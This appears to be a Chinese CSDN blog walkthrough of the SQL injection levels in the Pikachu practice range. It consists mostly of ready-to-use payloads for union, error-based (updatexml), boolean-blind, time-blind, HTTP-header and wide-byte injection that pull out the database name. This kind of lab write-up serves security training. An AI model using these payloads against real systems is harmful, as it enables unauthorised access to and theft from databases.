pikachu靶场通关-SQL-Inject

已于 2023-02-01 11:25:36 修改
阅读量165 收藏 2
点赞数 1
分类专栏: pikachu靶场通关 文章标签: mysql web安全
于 2023-01-30 00:49:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43381463/article/details/128796052
版权

SQL-Inject

数字型注入(post)

# 确定显示列数
payload: id=1 order by 2&submit=%E6%9F%A5%E8%AF%A2

# 确定输出点
payload: id=1 union select 1,2&submit=%E6%9F%A5%E8%AF%A2

# 爆库、爆表、爆字段
payload: id=1 union select 1,database()&submit=%E6%9F%A5%E8%AF%A2

字符型注入(get)

# 确定注入点
payload: 1' or 1=1#

# 确定输出列数
payload: 1'order by 1,2,3#

# 确定输出点
payload: 1' union select 1,2#

# 爆库、爆表、爆字段
payload: 1' union select 1,database()#

搜索型注入

# 确定注入点
payload: a%' #

# 确定输出列数
payload: allen%' order by 3 #

# 确定输出点
payload: allen%' union select 1,2,3 #

# 爆库、爆表、爆字段
payload: allen%' union select 1,2,database() #

XX型注入


payload: 1'order by 1,2,3#

payload: 1') union select 1,2#

payload: 1') union select 1,database()#

"insert/update"注入

payload: 1' or updatexml(1,concat(0x7e,database()),0) or '

delete注入

  • 抓包

    image-20230129235449417

  • 构造payload

    payload: or updatexml(1,concat(0x7e,database(),0x7e),0)

    image-20230129235750083

http头注入

  • 抓包

    image-20230130000050526

  • 构造payload

    payload: ' or updatexml(1,concat(0x7e,database()),0) or '

    image-20230130000235172

基于bool的盲注

# 确定字符型注入
payload: 1' and 1=1 #
payload: 1' and 1=2 #
payload: allen' and 1=1 #

payload: allen' and length(database())=7 #

payload: allen' and substr(database(),1,1)='p' #

基于时间的盲注

payload: allen' and sleep(5)#

payload: kobe' and if(length(database())=7,sleep(5),null)#

payload: kobe' and if((substr(database(),1,1))='p',sleep(5),null)#

wide byte注入

payload: name=1%df' or 1=1#&submit=%E6%9F%A5%E8%AF%A2

payload: name=1%df' union select 1,database()#&submit=%E6%9F%A5%E8%AF%A2
贫僧法号云空丶
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关教程
07-20
这个是刚开始学网络安全渗透的靶场练习心得,分享给大家
Pikachu靶场-SQL-Inject
自强不息
12-29 556
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Pikachu 通关手册(持续更新)_pikachu通关
最新发布
2401_84545804的博客
05-17 732
id=-1’ union select 1,database(),3 --+id=-1’ union select 1,version(),3 --+id=-1’ union select 1,@@version_compile_os,3 --+user() 数据库用户:test1.com/sqli-labs/Less-1/?id=-1’ union select 1,user(),3 --+通过 union 联合查询出信息,图中返回的数字为2,3,表示select 1,2,3中,2,3可以进行替换。
pikachu靶场--SQL inject--insert/update/delete/HTTP header注入/盲注【4.5】~【4.9】
lmei1228的博客
06-11 793
substr(database(),1,1)意思是把database()的结果取值,取从第1个字符开始的第1个字符,再包裹一层ascii(),意思是将取出的字符转换成ASCII码输出,这里我们的数据库名称为apache,所以结果依次为:a ,97。因此,我们可以构造闭合xxx' or updatexml(1,concat(0x7e,database()),0) or' ,这样,返回的报错内容里就有我们所需要的信息。但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的是时间,从而确定注入。
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2932
sql注入
pikachu靶场-SQL-Inject
braty_的博客
02-23 1217
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu靶场通关
11-19
pikachu靶场通关
pikachu靶场SQL注入.docx
09-13
"Pikachu靶场SQL注入" Pikachu靶场SQL注入是针对Web应用程序的一种攻击手段,通过对Web应用程序的输入参数进行tampering,来达到访问数据库的目的。下面是Pikachu靶场SQL注入的详细知识点: 一、数字型注入(POST...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
Pikachu靶场全级别通关教程详解
热门推荐
weixin_52385170的博客
12-02 3万+
Pikachu靶场通关教程,超详细,欢迎评论区留言,一起进步
pikachu通关教程
小宇的web博客
04-29 8265
pikachu通关教程(暴力破解和xss) 1.暴力破解 基于表单的暴力破解 1.最简单的暴力破解没有验证码不需要绕过,直接进行抓包。 直接找到一组账号和密码 验证码绕过(on server) 先进行抓包查看抓包的数据 这里发现验证码是不会发生改变的所以不用在意验证码,直接进行爆破即可 验证码绕过(on client) 这个验证码是通过前端的JavaScript来进行了验证码的验证,这里一些不懂技术的人可以被防治,但是懂技术人都懂在前端的验证码都是无效的 这里通过bp来进行前端代码修改来进行验证码的
pikachu通关教程通关详解超详细
qq_47289634的博客
03-11 3904
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。
pikachu靶场通关详解
ekmgrwaetaetawt的博客
08-02 92
pikachu靶场通关详解——XSS盲打
Pikachu 通关手册(持续更新)
Dasdwer的博客
03-22 394
1、必要知识:在MySql5.0以上版本中,MySQL存在一个自带数据库名为information_schema,他是一个存储记录所有数据库名,表名,列名的数据库,也相当于可以通过查询他获取指定数据库下面的表名或列名信息。version() 数据库版本:test1.com/sqli-labs/Less-1/?id=-1' union select 1,@@version_compile_os,3 --+user() 数据库用户:test1.com/sqli-labs/Less-1/?
pikachu 靶场通关(全)
Innocence_0的博客
04-12 2769
1.1.1 漏洞利用burp抓包,ctrl+i 添加爆破根据返回长度得到两个用户。
pikachu——一、暴力破解模块通关教程
钟言的博客
09-07 5114
本篇为pikachu靶场通关的第一章暴力破解模块的通关教程,详细内容包含了靶场介绍 Burte Force(暴力破解) 概述三、基于表单的暴力破解四、验证码绕过 (on client)五、验证码绕过 (on server)六、token防爆破等等
pikachu通关教程~~~~
m0_57349349的博客
08-03 3129
暴力破解 基于表单的暴力破解 1.拦截包发送到intruder 设置playload 判断长度得到账号密码 登录成功 2.验证码绕过(on sever) 输入正确验证码之后 在BURP上发送给intruder配置payload 得到密码 3.基于client端的验证码绕过(on client) 输入正确验证码 用burp拦截 放包 得到响应报文 编辑 把false改成true 得到的新的响应报文再放包 现在随便输入账号密...
pikachu靶场搭建及通关
wxh的博客
10-16 1002
下载工具:phpstudy下载后解压缩并放入如下文件夹(网站根目录)建议修改文件名称为 pikachu修改配置文件(mysql 用户名:root 密码:root 保存)强调一下:数据库密码默认为root,如果你修改了数据库密码,这里要跟着修改修改完保存,安装初始化界面点击安装/初始化,显示如下界面则安装完成。
pikachu靶场通关sql-inject
09-24
为了通关pikachu靶场的sql-inject,您可以按照以下步骤进行操作: 1. 使用sqlmap工具进行数据库名的查询。您可以使用以下命令来查询数据库名为pikachu的所有表名:sqlmap -u ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值